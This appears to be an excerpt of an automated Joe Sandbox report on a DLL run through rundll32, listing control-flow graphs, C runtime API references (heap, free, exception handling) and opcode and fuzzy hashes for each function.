            control_flow_graph 353 6ec46f2c-6ec46f3d call 6ec473b0 356 6ec46f4e-6ec46f55 353->356 357 6ec46f3f-6ec46f45 353->357 358 6ec46f57-6ec46f5a 356->358 359 6ec46f61-6ec46f75 dllmain_raw 356->359 357->356 360 6ec46f47-6ec46f49 357->360 358->359 362 6ec46f5c-6ec46f5f 358->362 363 6ec4701e-6ec47025 359->363 364 6ec46f7b-6ec46f8c dllmain_crt_dispatch 359->364 361 6ec47027-6ec47036 360->361 365 6ec46f92-6ec46fa4 call 6ec46640 362->365 363->361 364->363 364->365 368 6ec46fa6-6ec46fa8 365->368 369 6ec46fcd-6ec46fcf 365->369 368->369 370 6ec46faa-6ec46fc8 call 6ec46640 call 6ec46e7a dllmain_raw 368->370 371 6ec46fd6-6ec46fe7 dllmain_crt_dispatch 369->371 372 6ec46fd1-6ec46fd4 369->372 370->369 371->363 373 6ec46fe9-6ec4701b dllmain_raw 371->373 372->363 372->371 373->363
            APIs
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: dllmain_raw$dllmain_crt_dispatch
            • String ID:
            • API String ID: 3136044242-0
            • Opcode ID: af50ba1ba51b35ae5b3e24cd0d7adbe9be3660e38bc4eb5650f1914461514b4f
            • Instruction ID: 893a6a2560e56d30f819eaa54589fc365d3a4a56798e8800333223f3e5d4cc48
            • Opcode Fuzzy Hash: af50ba1ba51b35ae5b3e24cd0d7adbe9be3660e38bc4eb5650f1914461514b4f
            • Instruction Fuzzy Hash: CF21D372D11A29EFDB228FD5CD40AAF3A7DEB80794F014415F8255B258E7318D01ABE0

            Control-flow Graph

            APIs
            • GetLastError.KERNEL32(?,?,00000001,6EC4B68B,6EC4B935,?,?,6EC4AB0E), ref: 6EC4B428
            • _free.LIBCMT ref: 6EC4B485
            • _free.LIBCMT ref: 6EC4B4BB
            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6EC4B68B,6EC4B935,?,?,6EC4AB0E), ref: 6EC4B4C6
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ErrorLast_free
            • String ID:
            • API String ID: 2283115069-0
            • Opcode ID: 98c756b04f72611f646ab79ae595e26da71943bcdfced596886a3db6a6ce183a
            • Instruction ID: 32cb4dea4d506634c71e23186dc0f06d602218b2ec7da37abe4b8d493ba5d45e
            • Opcode Fuzzy Hash: 98c756b04f72611f646ab79ae595e26da71943bcdfced596886a3db6a6ce183a
            • Instruction Fuzzy Hash: 2811E972614B08EEDB416EF94D80E5F2A7DABC2778B250E24F934A31C8FF218C215515

            Control-flow Graph

            APIs
            • __RTC_Initialize.LIBCMT ref: 6EC46DC0
              • Part of subcall function 6EC47490: InitializeSListHead.KERNEL32(6EC5F718,6EC46DCA,6EC5C7B0,00000010,6EC46D5B,?,?,?,6EC46F85,?,00000001,?,?,00000001,?,6EC5C7F8), ref: 6EC47495
            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EC46E2A
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
            • String ID:
            • API String ID: 3231365870-0
            • Opcode ID: 158d22e35eda3ef6fa84b5d753465a22d627cbf95a91c8e5a223f2b6afe28323
            • Instruction ID: 1560327ef148be9cfa357d183e2c6352c48640189192ff5c2074e49693866022
            • Opcode Fuzzy Hash: 158d22e35eda3ef6fa84b5d753465a22d627cbf95a91c8e5a223f2b6afe28323
            • Instruction Fuzzy Hash: BF21D232564F55DEDB44ABF4D5107ED3BB5AF1236DF10085AD8806B3CAFB3240609AA6

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 455 6ec4b8b2-6ec4b8bd 456 6ec4b8bf-6ec4b8c9 455->456 457 6ec4b8cb-6ec4b8d1 455->457 456->457 458 6ec4b8ff-6ec4b90a call 6ec4b686 456->458 459 6ec4b8d3-6ec4b8d4 457->459 460 6ec4b8ea-6ec4b8fb RtlAllocateHeap 457->460 465 6ec4b90c-6ec4b90e 458->465 459->460 461 6ec4b8d6-6ec4b8dd call 6ec4e4b3 460->461 462 6ec4b8fd 460->462 461->458 468 6ec4b8df-6ec4b8e8 call 6ec49eaa 461->468 462->465 468->458 468->460
            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EC4B46E,00000001,00000364,00000006,000000FF,?,00000001,6EC4B68B,6EC4B935,?,?,6EC4AB0E), ref: 6EC4B8F3
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 1b8d9722cfcf1f8b3121d5cc4475dc4d4e49bcb565ccec835417144f08e6f69d
            • Instruction ID: 737f94b0250ada6c2e13501ec998e335cabfb4f0a5948edfb4cedd1b6852a7cd
            • Opcode Fuzzy Hash: 1b8d9722cfcf1f8b3121d5cc4475dc4d4e49bcb565ccec835417144f08e6f69d
            • Instruction Fuzzy Hash: 1BF05431656B2ADBEB515FE78D14B9F776CAF82760B114521EC14EA19CFB30D40146A0
            APIs
            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EC47294
            • IsDebuggerPresent.KERNEL32 ref: 6EC47360
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EC47380
            • UnhandledExceptionFilter.KERNEL32(?), ref: 6EC4738A
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
            • String ID:
            • API String ID: 254469556-0
            • Opcode ID: c9486506e4078b8fc07f31cd644a57c1e4228f99a60610e8eda76f102b06e557
            • Instruction ID: ced7bd275b9095005e594bb07d93993ab0474770744eabba89c9ed4ae5933a29
            • Opcode Fuzzy Hash: c9486506e4078b8fc07f31cd644a57c1e4228f99a60610e8eda76f102b06e557
            • Instruction Fuzzy Hash: 853127B5D15718DBDF50DFA4C9897CDBBB8AF08304F1045AAE80DAB280EB749A849F44
            APIs
            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EC49918
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EC49922
            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EC4992F
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 96cb3b677f81624134c03a6f547c9a7dfd4b983f4dcab571014f3d4a7f3266cb
            • Instruction ID: 5ab961b0527a078adaeb68d083bdd8baefe3ac582fe36f7918b554ebcab42e35
            • Opcode Fuzzy Hash: 96cb3b677f81624134c03a6f547c9a7dfd4b983f4dcab571014f3d4a7f3266cb
            • Instruction Fuzzy Hash: 4731D274911629DBCF61DF64C9887CDBBB8BF48310F5046EAE81CA7290EB349B858F44
            APIs
            • GetCurrentProcess.KERNEL32(?,?,6EC4A253,?,00000001,?,?), ref: 6EC4A276
            • TerminateProcess.KERNEL32(00000000,?,6EC4A253,?,00000001,?,?), ref: 6EC4A27D
            • ExitProcess.KERNEL32 ref: 6EC4A28F
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: 99b93354c4236ece675c3931e91bde6d6bd7eebe4552b5d9f5aac709665d2b04
            • Instruction ID: 9447dfc7912e39f4a156ebeeaf04b8a50017ddf508e879d6d260742bf40c1439
            • Opcode Fuzzy Hash: 99b93354c4236ece675c3931e91bde6d6bd7eebe4552b5d9f5aac709665d2b04
            • Instruction Fuzzy Hash: B9E0E631410A04EFCFA56F94C918A8D3B79FB85251B004524F41996535EB36D991EB94
            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EC51AAC,?,?,00000008,?,?,6EC51744,00000000), ref: 6EC51CDE
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: 5eadc1377c20f5f5bdc2d6af05729c48bdfae76039720befd8a45d3fe2347df5
            • Instruction ID: 73d698e9323002b47ceb8209607aa11d9b52691c3c5d6b45613a951555d9f642
            • Opcode Fuzzy Hash: 5eadc1377c20f5f5bdc2d6af05729c48bdfae76039720befd8a45d3fe2347df5
            • Instruction Fuzzy Hash: 55B16A31210A098FD745CF6CC49AB947BA0FF06364F258658E8E9CF3A5D336E9A5CB44
            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6EC470BD
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-0
            • Opcode ID: 5c52fef1228c1f96e71fc220224fdadc47d6e2c68c796266b906728db9f6a46c
            • Instruction ID: 677131a263793103067f0967117d260cc7ac7ef650333cdc69e0e8a02064e6f4
            • Opcode Fuzzy Hash: 5c52fef1228c1f96e71fc220224fdadc47d6e2c68c796266b906728db9f6a46c
            • Instruction Fuzzy Hash: 47515BB1A10B05CFDB15CF95C6917AABBF4FB88350F20846AE915FB284E3789950DF60
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b9a615d5c3bff4c19847cadbf3afa3ecc3f52674ba7c10417206cb2c92ed9a2f
            • Instruction ID: a6a53727ed82ae1218981f7a8ae1a5707a9bfe037e613493a10495a721142963
            • Opcode Fuzzy Hash: b9a615d5c3bff4c19847cadbf3afa3ecc3f52674ba7c10417206cb2c92ed9a2f
            • Instruction Fuzzy Hash: 4141A475804619EEDB50DFA9CC88AEEBBBCEF45304F1442D9E41DE3208EA349E858F50
            APIs
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: HeapProcess
            • String ID:
            • API String ID: 54951025-0
            • Opcode ID: d3164fb46e411923004990e7d84f65c4d47f05158edc80640c06db0732da19b9
            • Instruction ID: dadcf87e9dcc16d62c6568789197c890582e2d911c3beff18437f7eacc6f581c
            • Opcode Fuzzy Hash: d3164fb46e411923004990e7d84f65c4d47f05158edc80640c06db0732da19b9
            • Instruction Fuzzy Hash: 8AA01130200A00CF8F008E30832820A3BB8BA8A2E23008028E000E2000EB208020AA00
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
            • Instruction ID: aacb5aad0d124d97d0a4cbcbfc154ef0c43dec84aaa5b286e144ef297b4579c5
            • Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
            • Instruction Fuzzy Hash: 24E08C32A11328EBCB10CBD8C940E8EB3ECEB48B10B114496F911D3214E274DE00C7E0

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 498 6ec4ddf0-6ec4de04 499 6ec4de06-6ec4de0b 498->499 500 6ec4de72-6ec4de7a 498->500 499->500 503 6ec4de0d-6ec4de12 499->503 501 6ec4dec1-6ec4ded9 call 6ec4df61 500->501 502 6ec4de7c-6ec4de7f 500->502 510 6ec4dedc-6ec4dee3 501->510 502->501 506 6ec4de81-6ec4debe call 6ec4b90f * 4 502->506 503->500 505 6ec4de14-6ec4de17 503->505 505->500 508 6ec4de19-6ec4de21 505->508 506->501 511 6ec4de23-6ec4de26 508->511 512 6ec4de3b-6ec4de43 508->512 514 6ec4dee5-6ec4dee9 510->514 515 6ec4df02-6ec4df06 510->515 511->512 516 6ec4de28-6ec4de3a call 6ec4b90f call 6ec4e230 511->516 517 6ec4de45-6ec4de48 512->517 518 6ec4de5d-6ec4de71 call 6ec4b90f * 2 512->518 521 6ec4deff 514->521 522 6ec4deeb-6ec4deee 514->522 526 6ec4df1e-6ec4df2a 515->526 527 6ec4df08-6ec4df0d 515->527 516->512 517->518 524 6ec4de4a-6ec4de5c call 6ec4b90f call 6ec4e32e 517->524 518->500 521->515 522->521 530 6ec4def0-6ec4defe call 6ec4b90f * 2 522->530 524->518 526->510 529 6ec4df2c-6ec4df37 call 6ec4b90f 526->529 534 6ec4df0f-6ec4df12 527->534 535 6ec4df1b 527->535 530->521 534->535 542 6ec4df14-6ec4df1a call 6ec4b90f 534->542 535->526 542->535
            APIs
            • ___free_lconv_mon.LIBCMT ref: 6EC4DE34
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E24D
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E25F
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E271
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E283
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E295
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2A7
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2B9
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2CB
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2DD
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2EF
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E301
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E313
              • Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E325
            • _free.LIBCMT ref: 6EC4DE29
              • Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
              • Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937
            • _free.LIBCMT ref: 6EC4DE4B
            • _free.LIBCMT ref: 6EC4DE60
            • _free.LIBCMT ref: 6EC4DE6B
            • _free.LIBCMT ref: 6EC4DE8D
            • _free.LIBCMT ref: 6EC4DEA0
            • _free.LIBCMT ref: 6EC4DEAE
            • _free.LIBCMT ref: 6EC4DEB9
            • _free.LIBCMT ref: 6EC4DEF1
            • _free.LIBCMT ref: 6EC4DEF8
            • _free.LIBCMT ref: 6EC4DF15
            • _free.LIBCMT ref: 6EC4DF2D
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
            • String ID:
            • API String ID: 161543041-0
            • Opcode ID: 3f1209e510257b399763bff0af006d841de693258d541d090043124c2ba6447e
            • Instruction ID: cf0a21f93f013f692f3fd59be155e903d636172f09aa63ea5b160b9872398581
            • Opcode Fuzzy Hash: 3f1209e510257b399763bff0af006d841de693258d541d090043124c2ba6447e
            • Instruction Fuzzy Hash: 38314C72604205DFEB61AEB9D840B9A7BF9AF11354F109829E495D7198FF32ED90CB20

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 555 6ec482c0-6ec482eb call 6ec4922d 558 6ec48664-6ec48669 call 6ec4adfe 555->558 559 6ec482f1-6ec482f4 555->559 559->558 561 6ec482fa-6ec48303 559->561 563 6ec48400-6ec48406 561->563 564 6ec48309-6ec4830d 561->564 565 6ec4840e-6ec4841c 563->565 564->563 566 6ec48313-6ec4831a 564->566 567 6ec48422-6ec48426 565->567 568 6ec485cd-6ec485d0 565->568 569 6ec48332-6ec48337 566->569 570 6ec4831c-6ec48323 566->570 567->568 575 6ec4842c-6ec48433 567->575 572 6ec485d2-6ec485d5 568->572 573 6ec485f3-6ec485fc call 6ec47f7b 568->573 569->563 574 6ec4833d-6ec48345 call 6ec47f7b 569->574 570->569 571 6ec48325-6ec4832c 570->571 571->563 571->569 572->558 576 6ec485db-6ec485f0 call 6ec4866a 572->576 573->558 588 6ec485fe-6ec48602 573->588 574->588 589 6ec4834b-6ec48364 call 6ec47f7b * 2 574->589 578 6ec48435-6ec4843c 575->578 579 6ec4844b-6ec48451 575->579 576->573 578->579 583 6ec4843e-6ec48445 578->583 585 6ec48457-6ec4847e call 6ec4752f 579->585 586 6ec48569-6ec4856d 579->586 583->568 583->579 585->586 601 6ec48484-6ec48487 585->601 591 6ec4856f-6ec48578 call 6ec478e5 586->591 592 6ec48579-6ec48585 586->592 589->558 613 6ec4836a-6ec48370 589->613 591->592 592->573 594 6ec48587-6ec4858b 592->594 598 6ec4859d-6ec485a5 594->598 599 6ec4858d-6ec48595 594->599 603 6ec485a7-6ec485ba call 6ec47f7b * 2 598->603 604 6ec485bc-6ec485c9 call 6ec48ccf 598->604 599->573 602 6ec48597-6ec4859b 599->602 606 6ec4848a-6ec4849f 601->606 602->573 602->598 632 6ec48603 call 6ec4adc2 603->632 620 6ec48628-6ec4863d call 6ec47f7b * 2 604->620 621 6ec485cb 604->621 610 6ec484a5-6ec484a8 606->610 611 6ec4854a-6ec4855d 606->611 610->611 616 6ec484ae-6ec484b6 610->616 611->606 614 6ec48563-6ec48566 611->614 618 6ec48372-6ec48376 613->618 619 6ec4839c-6ec483a4 call 6ec47f7b 613->619 614->586 616->611 622 6ec484bc-6ec484d0 616->622 618->619 627 6ec48378-6ec4837f 618->627 636 6ec483a6-6ec483c6 call 6ec47f7b * 2 call 6ec48ccf 619->636 637 6ec48408-6ec4840b 619->637 650 6ec48642-6ec4865f call 6ec47722 call 6ec48bcf call 6ec48d8c call 6ec48b46 620->650 651 6ec4863f 620->651 621->573 623 6ec484d3-6ec484e3 622->623 628 6ec484e5-6ec484f8 call 6ec487a0 623->628 629 6ec4850b-6ec48518 623->629 633 6ec48381-6ec48388 627->633 634 6ec48393-6ec48396 627->634 647 6ec4851c-6ec48544 call 6ec48240 628->647 648 6ec484fa-6ec48500 628->648 629->623 639 6ec4851a 629->639 646 6ec48608-6ec48623 call 6ec478e5 call 6ec4894b call 6ec47b0e 632->646 633->634 641 6ec4838a-6ec48391 633->641 634->558 634->619 636->637 668 6ec483c8-6ec483cd 636->668 637->565 645 6ec48547 639->645 641->619 641->634 645->611 646->620 647->645 648->628 653 6ec48502-6ec48508 648->653 650->558 651->650 653->629 668->632 670 6ec483d3-6ec483e6 call 6ec48963 668->670 670->646 675 6ec483ec-6ec483f8 670->675 675->632 676 6ec483fe 675->676 676->670
            APIs
            • IsInExceptionSpec.LIBVCRUNTIME ref: 6EC483BD
            • type_info::operator==.LIBVCRUNTIME ref: 6EC483DF
            • ___TypeMatch.LIBVCRUNTIME ref: 6EC484EE
            • IsInExceptionSpec.LIBVCRUNTIME ref: 6EC485C0
            • _UnwindNestedFrames.LIBCMT ref: 6EC48644
            • CallUnexpected.LIBVCRUNTIME ref: 6EC4865F
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
            • String ID: csm$csm$csm
            • API String ID: 2123188842-393685449
            • Opcode ID: 2817b205edd786707feb20e9b839bc636f79d4718342dd3834a5cb6f69a54d7c
            • Instruction ID: 0de38fb79c00bd42073a957eb609be4a5476be9559f808445b00d8db9b59c0e3
            • Opcode Fuzzy Hash: 2817b205edd786707feb20e9b839bc636f79d4718342dd3834a5cb6f69a54d7c
            • Instruction Fuzzy Hash: 00B1437280020AEFDF45CFE8D890E9EBBB9BF05314B10455AF8116B259E335DA52DBD1

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 197bed687a609df6c74633c12f0a4743440c8f132b60981083006bad36b6299a
            • Instruction ID: 7462df84dbcbbe12891deacc2d708393c8fb74034c844e2d89fd0fa7ea084ce6
            • Opcode Fuzzy Hash: 197bed687a609df6c74633c12f0a4743440c8f132b60981083006bad36b6299a
            • Instruction Fuzzy Hash: 6921667690410CEFCB41EFD4C880DDE7BB9AF18244F0185A6E5659B125EB32EB549B80
            APIs
            • _ValidateLocalCookies.LIBCMT ref: 6EC47C47
            • ___except_validate_context_record.LIBVCRUNTIME ref: 6EC47C4F
            • _ValidateLocalCookies.LIBCMT ref: 6EC47CD8
            • __IsNonwritableInCurrentImage.LIBCMT ref: 6EC47D03
            • _ValidateLocalCookies.LIBCMT ref: 6EC47D58
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
